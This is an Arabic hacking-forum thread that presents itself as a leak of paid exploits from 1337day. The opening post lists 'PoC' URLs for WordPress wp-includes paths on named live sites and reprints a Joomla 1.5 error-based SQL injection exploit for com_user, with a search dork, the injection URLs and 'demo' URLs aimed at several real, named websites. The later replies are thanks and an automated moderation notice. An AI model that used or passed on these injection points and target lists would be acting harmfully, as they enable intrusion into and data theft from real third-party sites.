    :-http://sqayasia.com/wp-includes/feed-rss.php
    http://www.way2blogging.org/wp-includes/feed-rss.php
     
    /wp-includes/feed-rss2-comments.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2-comments.php
    http://www.way2blogging.org/wp-includes/feed-rss2-comments.php
     
    /wp-includes/feed-rss2.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2.php
    http://www.way2blogging.org/wp-includes/feed-rss2.php
     
    /wp-includes/functions.php
    Poc
    :- http://sqayasia.com/wp-includes/functions.php
    http://www.way2blogging.org/wp-includes/functions.php 
     
    # 1337day.com [2012-12-12]
    Joomla all v1.5 Error Based SQL Injection Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Caddy-dz member from Inj3ct0r Team                 1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ####
    # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
    # Author: Caddy-Dz
    # Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
    # E-mail: [email protected] 
    # Category:: webapps
    # script home : http://joomla.com
    # Dork : inurl:option=com_user
    # Security Risk: critical
    # Tested on: Back|Track 5 KDE / French
    ####
    # this was written for educational purpose only. use it at your own risk.
    # author will be not responsible for any damage caused! user assumes all responsibility 
    # intended for authorized web application pentesting only!
     
    // Description :
     
    the affected component is /com_user/ in all joomla v1.5
    P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
     
    // Exploit :
     
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character]
     
    #  priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
     
    // Demo :
     
    http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
    http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
    http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
     
     
    # Greets To : ==============================================================================
    #  The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , 
    #  D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
    #  ... And All Algerian Hax0rs
    ============================================================================================ 
     
    # 1337day.com [2012-12-12]
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ĴŎђЙ cĘŇĄ

    ĴŎђЙ cĘŇĄ ExpErt DeveloPer

    الأنتساب:
    ‏4 سبتمبر 2011
    المشاركات:
    62
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: تسريب جميع تغرات 1337day المعروضة للبيع

    وعليكم السلام ورحمه الله وبركاته

    يعطيك العافيه ي بطل
     
  4. أبـو سـعيد

    أبـو سـعيد Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    أرض الحرمين الشريفين
    رد: تسريب جميع تغرات 1337day المعروضة للبيع

    الله يعيطك العافيه , الله يجزاك كل خير ~​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة